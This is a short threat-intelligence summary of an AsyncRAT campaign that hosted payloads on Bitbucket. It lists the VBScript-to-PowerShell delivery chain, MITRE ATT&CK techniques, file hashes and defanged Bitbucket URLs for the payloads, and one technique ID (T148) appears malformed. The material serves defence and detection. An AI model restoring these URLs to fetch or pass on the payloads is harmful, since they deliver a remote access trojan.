This article discusses a sophisticated attack campaign utilizing AsyncRAT malware delivered through the legitimate platform Bitbucket. The attackers exploit Bitbucket’s nature as a widely trusted code hosting service to obscure their malicious activities, using layers of obfuscation to hide their payload and evade detection. Key indicators of compromise have been identified to help combat this threat. Affected: Bitbucket, victims of AsyncRAT malware
Keypoints :
- Attackers used Bitbucket to host AsyncRAT payloads, leveraging its legitimacy and accessibility.
- Multi-stage approach employed, featuring VBScript and PowerShell for delivery mechanisms.
- VBScript acts as an obfuscation layer to execute PowerShell commands.
- PowerShell downloads the actual malicious file (dllhope.txt) from Bitbucket.
- AsyncRAT is a powerful Remote Access Trojan facilitating extensive control over infected machines.
- Different layers of encoding and obfuscation were used to evade detection.
- Indicators of compromise (IOCs) were identified, including specific file names and URLs.
MITRE Techniques :
- Execution: Command and Scripting Interpreter: PowerShell (T1059.001) – Powershell command execution to download the payload.
- Execution: Command and Scripting Interpreter: Windows Command Shell (T1059.003) – Utilized for command execution in the attack.
- Persistence: Boot Autostart Execution: Registry Run Keys / Startup Folder (T1547) – Mechanism to maintain persistence.
- Defense Evasion: Obfuscated Files or Information (T1027) – Malware uses obfuscation to hide its true nature.
- Defense Evasion: Masquerading (T1036) – The malicious files use legitimate names to avoid suspicion.
- Defense Evasion: Deobfuscate/Decode Files or Information (T1140) – Techniques used to decode hidden elements of the attack.
- Defense Evasion: Process Injection (T1055) – Injecting into processes for stealthy execution.
- Defense Evasion: Virtualization/Sandbox Evasion (T1497) – Checks for virtualization tools to evade detection.
- Impact: Remote Access Software (T1219) – Provides attackers with control over victim systems.
- Collection: Input Capture: Keylogging (T1056.001) – Capturing keystrokes from infected machines.
- Exfiltration: Exfiltration Over C2 Channel (T1041) – Data sent back to the attackers via command-and-control.
- Credential Access: Credential Dumping (T1003) – Stealing credentials from the infected system.
- Lateral Movement: Remote Services: Remote Desktop Protocol (T1021.001) – Using Remote Desktop Protocol for lateral movement.
- Impact: Data Encrypted for Impact (T148) – Encrypting files on the victim’s system.
Indicator of Compromise :
- SHA256 Filename 1 8fb6471b01c1d8122548d184ce5bceefae4df4ef0f1d1bb5c67b276c258e9125
- SHA256 Filename 2 E0d40dbc6be121cf62f222295ab1e01b5ce741d37d6c4b53f3beacb38a66e8e8
- SHA256 Filename 3 Ab3d8588b58152994d299fa57842798f3071cb0f550b37f1db8b42d56f8580f2
- URL hXXps[:]//bitbucket.org/jaiprrfc/sds/downloads/envio4sep.txt
- URL hXXps[:]//bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt
Full Story: https://www.gdatasoftware.com/blog/2024/10/38043-asyncrat-bitbucket